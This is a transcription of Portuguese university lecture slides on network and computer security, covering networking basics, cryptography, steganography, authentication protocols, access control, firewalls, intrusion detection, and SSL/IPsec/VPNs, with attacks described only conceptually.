Segurança Informática

Size: px
Start display at page:

Download "Segurança Informática"

Transcription

1 Segurança Informática M I M / P E D R O B R A N D Ã O References 2 Some slides are based on Computer Networking: A Top Down Approach 5th edition. Jim Kurose, Keith Ross Addison-Wesley, April 2009 Others by Dr Lawrie Brown for Computer Security: Principles and Practice, 1/e, by William Stallings and Lawrie Brown Still some from Mark Stamp Information Security: Principles and Practice 2nd edition (Wiley 2011). Segurança Informática nas redes 1

2 Contents Overview Some background (network stuff) Crypto reminders Steganography Authentication Access control/authorization Side channels CAPTCHAs 3 DoS Attacks Firewalls Intrusion Detection Systems (IDS) Internet Security Protocols Authentication protocol SSL, IPsec, VPNs, S/MIME Other subjects Overview 4 Segurança Informática nas redes 2

3 Key Security Concepts 5 Computer Security Challenges 1. not simple 2. must consider potential attacks 3. procedures used counter-intuitive 4. must decide where to deploy mechanisms 5. involve algorithms and secret info 6. battle of wits between attacker / admin 7. not perceived on benefit until fails 8. requires regular monitoring 9. too often an after-thought 10. regarded as impediment to using system 6 Segurança Informática nas redes 3

4 Network Security Attacks classify as passive or active passive attacks are eavesdropping release of message contents traffic analysis are hard to detect so aim to prevent active attacks modify/fake data masquerade replay modification denial of service hard to prevent so aim to detect 7 Security Taxonomy 8 Segurança Informática nas redes 4

5 Background 9 N E T W O R K S T U F F IP Address: intro 10 IP Address: 32 bits identifier of network interface Routers have multiple interfaces 128 bits for IPv6 Terminals usually have only one One IP address per each interface decimal = binary Segurança Informática nas redes 5

6 Sub-networks 11 IP Address: Sub-net part (most significant bits) Node part (less significant bits) What is a sub-net? Group of interfaces with the same sub-net IP address part Nodes can reach each other without router intervention sub-net Network with 3 sub-networks IP Address: CIDR CIDR: Classless Inter Domain Routing Subnet part of arbitrary size 12 format: a.b.c.d/x, where x is the number of bits of the subnet part subnet node /23 Segurança Informática nas redes 6

7 Routing Tables 13 Net 1 Net 2 R2 Net 3 Net 4 R1 Destination Net 1 Next Hop R1 R3 Net 2 Direct delivery Net 5 Net 3 Direct delivery Net 4 R3 Net 5 R R R Destination Mask Next Hop R Direct delivery Direct delivery IP addresses: how to get one? Who says which machine has which IP address? 14 hard-coded by system admin in a file DHCP: Dynamic Host Configuration Protocol: dynamically get address from as server plug-and-play Segurança Informática nas redes 7

8 DHCP: Dynamic Host Configuration Protocol 15 Goal: allow host to dynamically obtain its IP address from network server when it joins network Can renew its lease on address in use Allows reuse of addresses (only hold address while connected an on ) Support for mobile users who want to join network DHCP overview: host broadcasts DHCP discover msg [optional] DHCP server responds with DHCP offer msg [optional] host requests IP address: DHCP request msg DHCP server sends address: DHCP ack msg DHCP client-server scenario 16 A DHCP server B E arriving DHCP client needs address in this network Segurança Informática nas redes 8

9 DHCP: more than IP address DHCP can return more than just allocated IP address on subnet: address of first-hop router for client name and IP address of DNS sever network mask (indicating network versus host portion of address) 17 Reminder: Internet Stack 18 application: network applications FTP, SMTP, HTTP transport: data transfer between processes TCP, UDP network: routing of datagrams between source and destination IP, routing protocols logic: data transfer between adjacent network elements PPP, Ethernet Physical: bits on the wire Application Transport Network Logic Physical Segurança Informática nas redes 9

10 Link Layer: Introduction - terminology hosts and routers are nodes communication channels that connect adjacent nodes along communication path are links wired links wireless links LANs layer-2 packet is a frame, encapsulates datagram 19 data-link layer has responsibility of transferring datagram from one node to adjacent node over a link framing, link access: Link Layer Services encapsulate datagram into frame, adding header, trailer 20 channel access if shared medium MAC addresses used in frame headers to identify source, destination different from IP address! reliable delivery between adjacent nodes Similar techniques to transport layer seldom used on low bit-error link (fiber, some twisted pair) wireless links: high error rates Segurança Informática nas redes 10

11 32-bit IP address: network-layer address MAC Addresses and ARP used to get datagram to destination IP subnet MAC (or LAN or physical or Ethernet) address: 21 function: get frame from one interface to another physicallyconnected interface (same network) 48 bit MAC address (for most LANs) burned in NIC ROM, also sometimes software settable LAN Addresses and ARP Each adapter on LAN has unique LAN address 22 1A-2F-BB AD Broadcast address = FF-FF-FF-FF-FF-FF F7-2B LAN (wired or wireless) D7-FA-20-B0 = adapter 0C-C4-11-6F-E3-98 Segurança Informática nas redes 11

12 ARP: Address Resolution Protocol 24 Question: how to determine MAC address of B knowing B s IP address? A-2F-BB AD Each IP node on LAN has ARP table ARP table: IP/MAC address mappings for some LAN nodes F7-2B LAN D7-FA-20-B C-C4-11-6F-E3-98 Ethernet Star topology bus topology popular through mid 90s all nodes in same collision domain (can collide with each other) today: star topology prevails active switch in center each spoke runs a (separate) Ethernet protocol (nodes do not collide with each other) 25 switch bus: coaxial cable star Segurança Informática nas redes 12

13 Switches vs. Routers both store-and-forward devices routers: network layer devices (examine network layer headers) switches are link layer devices routers maintain routing tables, implement routing algorithms switches maintain switch tables, implement filtering, learning algorithms 26 Elements of a wireless network 27 network infrastructure wireless hosts laptop, PDA, IP phone run applications may be stationary (nonmobile) or mobile wireless does not always mean mobility Segurança Informática nas redes 13

14 Elements of a wireless network 28 network infrastructure base station typically connected to wired network relay - responsible for sending packets between wired network and wireless host(s) in its area e.g., cell towers, access points Elements of a wireless network 29 network infrastructure wireless link typically used to connect mobile(s) to base station also used as backbone link multiple access protocol coordinates link access various data rates, transmission distance Segurança Informática nas redes 14

15 Elements of a wireless network 30 network infrastructure infrastructure mode base station connects mobiles into wired network handoff: mobile changes base station providing connection into wired network Elements of a wireless network 31 ad hoc mode no base stations nodes can only transmit to other nodes within link coverage nodes organize themselves into a network: route among themselves Segurança Informática nas redes 15

16 Data rate (Mbps) Characteristics of selected wireless link standards n a,g b a,g point-to-point (WiMAX) UMTS/WCDMA-HSPDA, CDMA2000-1xEVDO data 3G cellular enhanced UMTS/WCDMA, CDMA2000 IS-95, CDMA, GSM 3G 2G Indoor 10-30m Outdoor m Mid-range outdoor 200m 4 Km Long-range outdoor 5Km 20 Km Mesh Networks Wired link 33 Wireless link to infrastructure Wireless link to Mesh ISP B Internet ISP A Segurança Informática nas redes 16

17 Crypto reminders 34 Symmetric Encryption 35 Segurança Informática nas redes 17

18 Public Key Encryption 36 Public Key Authentication 37 Segurança Informática nas redes 18

19 Message Authentication Codes 38 Secure Hash Functions 39 Segurança Informática nas redes 19

20 40 Message Authentication X.509 Certificates 41 Segurança Informática nas redes 20

21 42 CA root certificates 43 CA gratuitas para . Server Certificate Segurança Informática nas redes 21

22 Crypto reminders 44 Mail certificate 45 Steganography Segurança Informática nas redes 22

23 Steganography According to Herodotus (Greece 440 BC) Shaved slave s head Wrote message on head Let hair grow back Send slave to deliver message Shave slave s head to expose message (warning of Persian invasion) Historically, steganography used more than cryptography! 46 Images and Steganography Images use 24 bits for color: RGB 8 bits for red, 8 for green, 8 for blue For example 0x7E 0x52 0x90 is this color 0xFE 0x52 0x90 is this color While 47 0xAB 0x33 0xF0 is this color 0xAB 0x33 0xF1 is this color Low-order bits don t matter Segurança Informática nas redes 23

24 Images and Stego 48 Given an uncompressed image file For example, BMP format we can insert information into low-order RGB bits Since low-order RGB bits don t matter, result will be invisible to human eye But, computer program can see the bits 49 Stego Example 1 Left side: plain Alice image Right side: Alice with entire Alice in Wonderland (pdf) hidden in the image Segurança Informática nas redes 24

25 Non-Stego Example 50 Walrus.html in web browser View source reveals: <font color=#000000>"the time has come," the Walrus said,</font><br> <font color=#000000>"to talk of many things: </font><br> <font color=#000000>of shoes and ships and sealing wax </font><br> <font color=#000000>of cabbages and kings </font><br> <font color=#000000>and why the sea is boiling hot </font><br> <font color=#000000>and whether pigs have wings." </font><br> Seg. Informática - pbrandao Stego Example 2 51 stegowalrus.html in web browser View source reveals: <font color=#000100>"the time has come," the Walrus said,</font><br> <font color=#010000>"to talk of many things: </font><br> <font color=#010100>of shoes and ships and sealing wax </font><br> <font color=#010000>of cabbages and kings </font><br> <font color=#010000>and why the sea is boiling hot </font><br> <font color=#010000>and whether pigs have wings." </font><br> Hidden message: = S, = I, 00 Seg. Informática - pbrandao Segurança Informática nas redes 25

26 Authentication 52 User Authentication fundamental security building block basis of access control & user accountability is the process of verifying an identity claimed by or for a system entity has two steps: identification - specify identifier verification - bind entity (person) and identifier distinct from message authentication 53 Segurança Informática nas redes 26

27 Means of User Authentication four means of authenticating user's identity based one something the individual knows - e.g. password, PIN possesses - e.g. key, token, smartcard is (static biometrics) - e.g. fingerprint, retina does (dynamic biometrics) - e.g. voice, sign can use alone or combined all can provide user authentication all have issues 54 Why Passwords? Why is something you know more popular than something you have and something you are? Cost: passwords are free 55 Convenience: easier for admin to reset pwd than to issue a new thumb Segurança Informática nas redes 27

28 Crypto keys Suppose key is 64 bits Then 2 64 keys Choose key at random then attacker must try about 2 63 keys Keys vs Passwords 56 Bank password: m1s3cr3t Passwords Suppose passwords are 8 characters, and 256 different characters Then = 2 64 pwds Users do not select passwords at random Attacker has far less than 2 63 pwds to try (dictionary attack) Good and Bad Passwords Bad passwords frank Fido password 4444 Pikachu AustinStamp 57 Good Passwords? jfiej,43j-emml+y P0kem0N FSa7Yago 0nceuP0nAt1m8 PokeGCTall150 Segurança Informática nas redes 28

29 Token Authentication object user possesses to authenticate, e.g. embossed card magnetic stripe card memory card smartcard 58 Smart card Cartão de Cidadão 59 From [SecHISSantos] Segurança Informática nas redes 29

30 Cartão de Cidadão 60 From [SecHISSantos] 61 CC Properties 1 Data not accessible 2 PIN (password) protected access/use From [SecHISSantos] Properties Visible Machine Integrated Readable Zone Circuit Last names X X X First names X X X Parents Names X X Nacionality X X X Birth date X X X Sex X X X Height X X Facial Image X X Signature X Civil ID Number X X Tax ID Number X X Health ID Number X X Social Security ID Number X X Document Number X X X Emitting Country (Portuguese Republic) X Type of document X Expiry date X X Emission date X Address X 1 Fingerprints (2) X 2 Eventual indications, according to the law X Authentication certificate X 2 Electronic signature certificate Software applications needed Free writing zone for citizen use Additional health data (health sub-system, etc) X X X X Segurança Informática nas redes 30

31 Biometric Authentication 62 authenticate user based on one of their physical characteristics 63 Operation of a Biometric System Segurança Informática nas redes 31

32 Remote User Authentication authentication over network more complex problems of eavesdropping, replay generally use challenge-response user sends identity host responds with random number user computes f(r,h(p)) and sends back host compares value from user with own computed value, if match user authenticated protects against a number of attacks 64 client attacks host attacks eavesdropping replay trojan horse Authentication Security Issues denial-of-service 65 Segurança Informática nas redes 32

33 Access Control 66 Access Control The prevention of unauthorized use of a resource, including the prevention of use of a resource in an unauthorized manner central element of computer security assume users and groups authenticate to system assigned access rights to certain resources on system 67 Segurança Informática nas redes 33

34 Access Control Principles 68 Access Control Elements subject - entity that can access objects a process representing user/application often have 3 classes: owner, group, world object - access controlled resource e.g. files, directories, records, programs etc number/type depend on environment access right - way in which subject accesses an object e.g. read, write, execute, delete, create, search 69 Segurança Informática nas redes 34

35 UNIX File Access Control 70 rwxrw---- Owner can read, write and execute the file Any user in the owner s group can read, write the file All other users cannot read, write or execute the file 71 Role-Based Access Control Segurança Informática nas redes 35

36 Access control Segurança Informática - MIM 2011/12 72 Side channels Multilevel Security (MLS) MLS needed when subjects/objects at different levels use/on same system Security levels for subjects and objects For DoD levels, we have: TOP SECRET > SECRET > CONFIDENTIAL > UNCLASSIFIED Subjects have clearance and objects have classifications 73 Segurança Informática nas redes 36

37 Covert Channel 74 MLS designed to restrict legitimate channels of communication May be other ways for information to flow For example, resources shared at different levels could be used to signal information Covert channel: a communication path not intended as such by system s designers Seg. Informática - pbrandao Covert Channel Example Alice has TOP SECRET clearance, Bob has CONFIDENTIAL clearance Suppose the file space shared by all users Alice creates file FileXYzW to signal 1 to Bob, and removes file to signal 0 Once per minute Bob lists the files If file FileXYzW does not exist, Alice sent 0 If file FileXYzW exists, Alice sent 1 Alice can leak TOP SECRET info to Bob! 75 Segurança Informática nas redes 37

38 Inference Control Example Suppose we query a database Question: What is average salary of female CS professors at SJSU? Answer: $95,000 Question: How many female CS professors at SJSU? Answer: 1 Specific information has leaked from responses to general questions! 76 Inference Control and Research For example, medical records are private but valuable for research How to make info available for research and protect privacy? How to allow access to such data without leaking specific information? 77 Segurança Informática nas redes 38

39 Naïve Inference Control 78 Remove names from medical records? Still may be easy to get specific info from such anonymous data Removing names is not enough As seen in previous example What more can be done? Less-naïve Inference Control Query set size control Don t return an answer if set size is too small N-respondent, k% dominance rule Do not release statistic if k% or more contributed by N or fewer Example: Avg salary in Bill Gates neighborhood This approach used by US Census Bureau Randomization Add small amount of random noise to data Many other methods none satisfactory 79 Segurança Informática nas redes 39

40 Side Channel Attacks on Crypto 80 Sometimes possible to recover key without directly attacking the crypto algorithm A side channel consists of incidental information Side channels can arise due to The way that a computation is performed Media used, power consumed, unintended emanations, etc. Induced faults can also reveal information Side channel may reveal a crypto key Seg. Informática - pbrandao Side Channels 81 Emanations security (EMSEC) Electromagnetic field (EMF) from computer screen can allow screen image to be reconstructed at a distance Smartcards have been attacked via EMF emanations Differential power analysis (DPA) Smartcard power usage depends on the computation Differential fault analysis (DFA) Key stored on smartcard in GSM system could be read using a flashbulb to induce faults Timing analysis Different computations take different time RSA keys recovered over a network (openssl)! Seg. Informática - pbrandao Segurança Informática nas redes 40

41 Access Control 82 CAPTCHA Turing Test Proposed by Alan Turing in 1950 Human asks questions to one human and one computer, without seeing either If questioner cannot distinguish human from computer, computer passes the test The gold standard in artificial intelligence 83 No computer can pass this today But some claim to be close to passing Segurança Informática nas redes 41

42 CAPTCHA CAPTCHA Completely Automated Public Turing test to tell Computers and Humans Apart Automated test is generated and scored by a computer program Public program and data are public Turing test to tell humans can pass the test, but machines cannot pass Also known as HIP == Human Interactive Proof Like an inverse Turing test (well, sort of ) 84 CAPTCHA Paradox? CAPTCHA is a program that can generate and grade tests that it itself cannot pass 85 much like some professors Paradox computer creates and scores test that it cannot pass! CAPTCHA used so that only humans can get access (i.e., no bots/computers) CAPTCHA is for access control Segurança Informática nas redes 42

43 CAPTCHA Uses? Original motivation: automated bots stuffed ballot box in vote for best CS grad school SJSU vs Stanford? Free services spammers like to use bots to sign up for 1000 s of accounts CAPTCHA employed so only humans get accounts Sites that do not want to be automatically indexed by search engines CAPTCHA would force human intervention 86 CAPTCHA: Rules of the Game Easy for most humans to pass Difficult or impossible for machines to pass Even with access to CAPTCHA software From attacker s perspective, the only unknown is a random number Desirable to have different CAPTCHAs in case some person cannot pass one type 87 Blind person could not pass visual test, etc. Segurança Informática nas redes 43

44 Do CAPTCHAs Exist? Test: Find 2 words in the following 88 Easy for most humans A (difficult?) OCR problem for computer o OCR == Optical Character Recognition DoS Attacks 89 D E N I A L O F S E R V I C E Segurança Informática nas redes 44

45 Classic Denial of Service Attacks 90 Source Address Spoofing use forged source addresses given sufficient privilege to raw sockets easy to create generate large volumes of packets directed at target with different, random, source addresses cause same congestion on attacked link responses are scattered across Internet real source is much harder to identify 91 Segurança Informática nas redes 45

46 other common attack SYN Spoofing attacks ability of a server to respond to future connection requests overflowing tables used to manage them hence an attack on system resource 92 TCP Connection Handshake 93 Segurança Informática nas redes 46

47 SYN Spoofing Attack 94 DDoS Control Hierarchy 95 Segurança Informática nas redes 47

48 Firewalls 96 Firewalls 97 Internet Firewall Firewall must determine what to let in to internal network and/or what to let out Access control for the network Internal network Segurança Informática nas redes 48

49 Firewall as Secretary A firewall is like a secretary To meet with an executive First contact the secretary Secretary decides if meeting is important So, secretary filters out many requests You want to meet chair of CS department? Secretary does some filtering You want to meet the PotUS? 98 Secretary does lots of filtering Firewall Terminology No standard firewall terminology Types of firewalls Packet filter works at network layer Stateful packet filter transport layer Application proxy application layer Other names often used E.g., deep packet inspection 99 Segurança Informática nas redes 49

50 100 inside outside Types of Firewalls Packet Filter 101 Operates at network layer Can filter based on Source IP address Destination IP address Source Port Destination Port Flag bits (SYN, ACK, etc.) Egress or ingress Application Transport Network Logic Physical Segurança Informática nas redes 50

51 Packet Filter 102 Advantages? Speed Disadvantages? No concept of state Cannot see TCP connections Blind to application data Application Transport Network Logic Physical Packet Filter Configured via Access Control Lists (ACLs) 103 Action Source IP Dest IP Source Port Dest Port Protocol Flag Bits Allow Inside Outside Any 80 HTTP Allow Outside Inside 80 > 1023 HTTP Deny All All All All All Any ACK All Q: Intention? A: Restrict traffic to Web browsing Segurança Informática nas redes 51

52 TCP ACK Scan Attacker scans for open ports thru firewall 104 Port scanning is first step in many attacks Attacker sends packet with ACK bit set, without prior 3-way handshake Violates TCP/IP protocol ACK packet pass thru packet filter firewall Appears to be part of an ongoing connection RST sent by recipient of such packet TCP ACK Scan Attacker knows port 1209 open thru firewall A stateful packet filter can prevent this 105 Since scans not part of established connections ACK dest port 1207 ACK dest port 1208 ACK dest port 1209 Trudy Packet Filter RST Internal Network Segurança Informática nas redes 52

53 Stateful Packet Filter 106 Adds state to packet filter Operates at transport layer Remembers TCP connections, flag bits, etc. Can even remember UDP packets (e.g., DNS requests) Application Transport Network Logic Physical Stateful Packet Filter 107 Advantages? Can do everything a packet filter can do plus... Keep track of ongoing connections (so prevents TCP ACK scan) Disadvantages? Cannot see application data Slower than packet filtering Application Transport Network Logic Physical Segurança Informática nas redes 53

54 Application Proxy 108 A proxy is something that acts on your behalf Application proxy looks at incoming application data Verifies that data is safe before letting it in Application Transport Network Logic Physical Application Proxy 109 Advantages? Complete view of connections and applications data Filter bad data at application layer (viruses, Word macros) Disadvantages? Speed Application Transport Network Logic Physical Segurança Informática nas redes 54

55 Deep Packet Inspection 110 Many buzzwords used for firewalls One example: deep packet inspection What could this mean? Look into packets, but don t really process the packets Effect like application proxy, but faster Firewalls and Defense in Depth Typical network security architecture 111 Web server DMZ FTP server DNS server Internet Packet Filter Application Proxy Intranet with additional defense Segurança Informática nas redes 55

56 Intrusion Detection Systems 112 Intruders significant issue hostile/unwanted trespass from benign to serious user trespass 113 unauthorized logon, privilege abuse software trespass virus, worm, or trojan horse classes of intruders: masquerader, misfeasor, clandestine user Segurança Informática nas redes 56

57 remote root compromise web server defacement Examples of Intrusion 114 guessing / cracking passwords copying viewing sensitive data / databases running a packet sniffer distributing pirated software using an unsecured modem to access net impersonating a user to reset password using an unattended workstation Security Intrusion & Detection Security Intrusion a security event, or combination of multiple security events, that constitutes a security incident in which an intruder gains, or attempts to gain, access to a system (or system resource) without having authorization to do so. Intrusion Detection a security service that monitors and analyzes system events for the purpose of finding, and providing real-time or near real-time warning of attempts to access system resources in an unauthorized manner. 115 Segurança Informática nas redes 57

58 Intrusion Detection Systems 116 Intrusion detection approaches Signature-based IDS Anomaly-based IDS Intrusion detection architectures Host-based IDS Network-based IDS logical components: sensors - collect data analyzers - determine if intrusion has occurred user interface - manage / direct / view IDS Host-Based IDS 117 Monitor activities on hosts for Known attacks Suspicious behavior Designed to detect attacks such as Buffer overflow Escalation of privilege, Little or no view of network activities Segurança Informática nas redes 58

59 Distributed Host-Based IDS 118 Network-Based IDS Monitor activity on the network for Known attacks Suspicious network activity 119 Designed to detect attacks such as Denial of service Network probes Malformed packets, etc. Some overlap with firewall Little or no view of host-base attacks Can have both host and network IDS Segurança Informática nas redes 59

60 NIDS Sensor Deployment 120 IDS Principles assume intruder behavior differs from legitimate users expect overlap as shown observe deviations from past history problems of: false positives false negatives must compromise 121 Segurança Informática nas redes 60

61 Internet security protocols 122 Protocol 123 Human protocols the rules followed in human interactions Example: Asking a question in class Networking protocols rules followed in networked communication systems Examples: HTTP, FTP, etc. Security protocol the (communication) rules followed in a security application Examples: SSL, IPSec, Kerberos, etc. Segurança Informática nas redes 61

62 Secure Entry to NSA 1. Insert badge into reader 2. Enter PIN Correct PIN? Yes? Enter No? Get shot by security guard 1. Insert ATM card 2. Enter PIN ATM Machine Protocol Correct PIN? Yes? Conduct your transaction(s) No? Machine (eventually) eats card Segurança Informática nas redes 62

63 Identify Friend or Foe (IFF) 126 Russian MIG Angola SAAF Impala K 1. N 2. E(N,K) Namibia K MIG in the Middle N SAAF Impala K 4. E(N,K) 2. N Angola 5. E(N,K) Russian MiG 1. N 6. E(N,K) Namibia K Segurança Informática nas redes 63

64 Internet security protocols Segurança Informática - MIM 2011/ Authentication protocol Authentication Alice must prove her identity to Bob Alice and Bob can be humans or computers May also require Bob to prove he s Bob (mutual authentication) Probably need to establish a session key May have other requirements, such as Use public keys Use symmetric keys Use hash functions 129 Anonymity, plausible deniability, etc., etc. Segurança Informática nas redes 64

65 Authentication Authentication on a stand-alone computer is relatively simple Hash password with salt, etc. Secure path, attacks on authentication software, keystroke logging, etc., are issues Authentication over a network is challenging Attacker can passively observe messages Attacker can replay messages 130 Active attacks possible (insert, delete, change) Simple Authentication 131 I m Alice Prove it My password is frank Alice Bob Simple and may be OK for standalone system But insecure for networked system Subject to a replay attack (next 2 slides) Also, Bob must know Alice s password Segurança Informática nas redes 65

66 Authentication Attack 132 I m Alice Prove it My password is frank Alice Bob Trudy Authentication Attack 133 I m Alice Prove it My password is frank Trudy Bob This is an example of a replay attack How can we prevent a replay? Segurança Informática nas redes 66

67 Better Authentication 134 I m Alice Prove it h(alice s password) Alice Bob Better since it hides Alice s password From both Bob and Trudy But still subject to replay Challenge-Response To prevent replay, use challenge-response Goal is to ensure freshness Suppose Bob wants to authenticate Alice 135 Challenge sent from Bob to Alice Challenge is chosen so that Replay is not possible Only Alice can provide the correct response Bob can verify the response Segurança Informática nas redes 67

68 Nonce To ensure freshness, can employ a nonce Nonce == number used once What to use for nonces? That is, what is the challenge? 136 What should Alice do with the nonce? That is, how to compute the response? How can Bob verify the response? Should we rely on passwords or keys? Challenge-Response 137 I m Alice Nonce h(alice s password, Nonce) Alice Bob Nonce is the challenge The hash is the response Nonce prevents replay, ensures freshness Password is something Alice knows Bob must know Alice s pwd to verify Segurança Informática nas redes 68

69 Generic Challenge-Response 138 I m Alice Nonce Something that could only be Alice from Alice (and Bob can verify) Bob In practice, how to achieve this? Hashed pwd works Encryption is better here (Why?) Symmetric Key Notation 139 Encrypt plaintext P with key K C = E(P,K) Decrypt ciphertext C with key K P = D(C,K) Here, we are concerned with attacks on protocols, not attacks on crypto So, we assume crypto algorithms secure Segurança Informática nas redes 69

70 Authentication: Symmetric Key 140 Alice and Bob share symmetric key K Key K known only to Alice and Bob Authenticate by proving knowledge of shared symmetric key How to accomplish this? Must not reveal key, must not allow replay (or other) attack, must be verifiable, Authentication with Symmetric Key 141 I m Alice R Alice, K E(R,K) Bob, K Secure method for Bob to authenticate Alice Alice does not authenticate Bob So, can we achieve mutual authentication? Segurança Informática nas redes 70

71 Mutual Authentication? 142 I m Alice, R E(R,K) E(R,K) Alice, K Bob, K What s wrong with this picture? Alice could be Trudy (or anybody else)! Mutual Authentication Since we have a secure one-way authentication protocol The obvious thing to do is to use the protocol twice 143 Once for Bob to authenticate Alice Once for Alice to authenticate Bob This has got to work Segurança Informática nas redes 71

72 Mutual Authentication 144 I m Alice, R A R B, E(R A, K) Alice, K E(R B, K) Bob, K This provides mutual authentication or does it? See the next slide Mutual Authentication Attack I m Alice, R A 2. R B, E(R A, K) Trudy Bob, K 3. I m Alice, R B 4. R C, E(R B, K) Trudy Bob, K Segurança Informática nas redes 72

73 Mutual Authentication Our one-way authentication protocol is not secure for mutual authentication Protocols are subtle! 146 The obvious thing may not be secure Also, if assumptions or environment change, protocol may not be secure This is a common source of security failure For example, Internet protocols Symmetric Key Mutual Authentication 147 I m Alice, R A R B, E( Bob,R A,K) E( Alice,R B,K) Alice, K Bob, K Do these insignificant changes help? Yes! Segurança Informática nas redes 73

74 Internet security protocols 148 Protocols SSL Secure Sockets Layer (SSL) 149 transport layer security service originally developed by Netscape version 3 designed with public input subsequently became Internet standard RFC2246: Transport Layer Security (TLS) use TCP to provide a reliable end-to-end service may be provided in underlying protocol suite or embedded in specific packages Segurança Informática nas redes 74

75 What is SSL? SSL is the protocol used for majority of secure transactions on the Internet For example, if you want to buy a book at amazon.com You want to be sure you are dealing with Amazon (authentication) Your credit card information must be protected in transit (confidentiality and/or integrity) 150 As long as you have money, Amazon doesn t really care who you are So, no need for mutual authentication SSL Protocol Stack 151 Socket Layer Application Transport Network Logic Physical User OS NIC Segurança Informática nas redes 75

76 SSL Record Protocol Services message integrity using a MAC with shared secret key similar to HMAC but with different padding confidentiality using symmetric encryption with a shared secret key defined by Handshake Protocol AES, IDEA, RC2-40, DES-40, DES, 3DES, Fortezza, RC4-40, RC4-128 message is compressed before encryption 152 Simple SSL-like Protocol I d like to talk to you securely Here s my certificate {K} Bob Alice protected HTTP Bob Is Alice sure she s talking to Bob? Is Bob sure he s talking to Alice? Segurança Informática nas redes 76

77 Internet security protocols Segurança Informática - MIM 2011/12 SSL Authentication Alice authenticates Bob, not vice-versa How does client authenticate server? Why would server not authenticate client? Mutual authentication is possible: Bob sends certificate request in message 2 Then client must have a valid certificate If server wants to authenticate client, server could instead require password Alice 155 Protocols IPsec Segurança Informática nas redes 77

78 IP Security various application security mechanisms eg. S/MIME, PGP, Kerberos, SSL/HTTPS security concerns cross protocol layers hence would like security implemented by the network for all applications authentication & encryption security features included in next-generation IPv6 also usable in existing IPv4 156 SSL vs IPSec IPSec Lives at the network layer (part of the OS) Encryption, integrity, authentication, etc. Is overly complex (some security issues) SSL (and IEEE standard known as TLS) Lives at socket layer (part of user space) Encryption, integrity, authentication, etc. Relatively simple and elegant specification Segurança Informática nas redes 78

79 SSL vs IPSec IPSec: OS must be aware, but not apps SSL: Apps must be aware, but not OS SSL built into Web early-on (Netscape) IPSec often used in VPNs (secure tunnel) Reluctance to retrofit applications for SSL IPSec not widely deployed (complexity, etc.) The bottom line Internet less secure than it should be! Part 3 Protocols 158 Ipsec and SSL 159 IPsec lives at the network layer IPsec is transparent to applications SSL IPsec Application Transport Network Logic Physical User OS NIC Segurança Informática nas redes 79

80 IPSec general IP Security mechanisms provides authentication confidentiality key management 160 applicable to use over LANs, across public & private WANs, & for the Internet IPSec Uses 161 Segurança Informática nas redes 80

81 Two protocols Authentication Header (AH) protocol provides source authentication & data integrity but not confidentiality Encapsulation Security Protocol (ESP) provides source authentication, data integrity, and confidentiality more widely used than AH Comparison of IPsec Modes Transport Mode IP header data IP header ESP/AH data Tunnel Mode IP header data Transport Mode o Host-to-host Tunnel Mode o Firewall-to-firewall Transport Mode not necessary but it s more efficient new IP hdr ESP/AH IP header data Segurança Informática nas redes 81

82 IPsec Transport mode 164 IPsec datagram emitted and received by end-system. Protects upper level protocols Ipsec secured IPsec Tunnel mode End routers are IPsec aware. Hosts need not be 165 Plain IP Plain IP Ipsec secured Segurança Informática nas redes 82

83 Internet security protocols Benefits of IPsec in a firewall/router provides strong security to all traffic crossing the perimeter in a firewall/router is resistant to bypass is below transport layer, hence transparent to applications can be transparent to end users can provide security for individual users secures routing architecture Protocols VPNs Segurança Informática nas redes 83

84 What are VPNs? 168 Provide a private network service using a shared (non-private) infrastructure Private network site 1 Shared infrastructure (eg. Internet) Private network site 2 Private network Types of VPNs 169 Mobile user Branch Shared infrastructure (e.g. Internet) Home user Partner Headquarters Segurança Informática nas redes 84

85 Site-to-site Connectivity between sites VPN Types 170 Intranet VPNs: sites of a single organization Extranet VPNs: sites of different organizations (business partners) Remote access Mobile or home based users access organization Provisioned by: Provider: a network provider offers the interconnection service User: the organization deploys/administers the VPN infrastructure IPsec Technologies for site to site Encryption/authentication GRE Generic Routing Encapsulation 171 Limited/no Encryption/authentication IP-in-IP No Encryption/authentication Headquarters Branch Segurança Informática nas redes 85

86 Internet security protocols Segurança Informática - MIM 2011/12 IPsec SSL/TLS Technologies for Remote access Clientless VPNs PPTP Point-to-Point Tunnelling Protocol Encryption/authentication 172 L2TP Layer two Tunnelling Protocol Limited/no Encryption/authentication Headquarters Mobile user 173 Protocols S/MIME Segurança Informática nas redes 86

87 S/MIME (Secure/Multipurpose Internet Mail Extensions) security enhancement to MIME original Internet RFC822 was text only MIME provided support for varying content types and multipart messages with encoding of binary data to textual form S/MIME added security enhancements have S/MIME support in many mail agents 174 eg MS Outlook, Mozilla, Mac Mail etc enveloped data S/MIME Functions encrypted content and associated keys signed data encoded message + signed digest clear-signed data cleartext message + encoded signed digest signed & enveloped data 175 nesting of signed & encrypted entities Segurança Informática nas redes 87

88 S/MIME Process 176 Others subjects 177 Segurança Informática nas redes 88

89 Phishing/Scamms Fake tries to lure victim to website Website tries to steal details of credit cards, authentication to website Usually website mimics a real website Test your might From verisign From sonicwall From paypal Examples of fraud from CGD 178 Virus Malware 179 Encrypted, polymorphic, metamorphic malware Trojan Worms Botnets Segurança Informática nas redes 89

90 Bot nets 180 Picture from Microsoft press Injections 181 SQL Injections XSS Cross-site scripting CSRF Cross-Site Request Forgery Segurança Informática nas redes 90

7 Network Security. 7.1 Introduction 7.2 Improving the Security 7.3 Internet Security Framework. 7.5 Absolute Security?

7 Network Security. 7.1 Introduction 7.2 Improving the Security 7.3 Internet Security Framework. 7.5 Absolute Security? 7 Network Security 7.1 Introduction 7.2 Improving the Security 7.3 Internet Security Framework 7.4 Firewalls 7.5 Absolute Security? 7.1 Introduction Security of Communications data transport e.g. risk

More information

CS 356 Lecture 27 Internet Security Protocols. Spring 2013

CS 356 Lecture 27 Internet Security Protocols. Spring 2013 CS 356 Lecture 27 Internet Security Protocols Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists

More information

Network Security 網 路 安 全. Lecture 1 February 20, 2012 洪 國 寶

Network Security 網 路 安 全. Lecture 1 February 20, 2012 洪 國 寶 Network Security 網 路 安 全 Lecture 1 February 20, 2012 洪 國 寶 1 Outline Course information Motivation Introduction to security Basic network concepts Network security models Outline of the course 2 Course

More information

Firewalls, Tunnels, and Network Intrusion Detection

Firewalls, Tunnels, and Network Intrusion Detection Firewalls, Tunnels, and Network Intrusion Detection 1 Part 1: Firewall as a Technique to create a virtual security wall separating your organization from the wild west of the public internet 2 1 Firewalls

More information

Chapter 10. Network Security

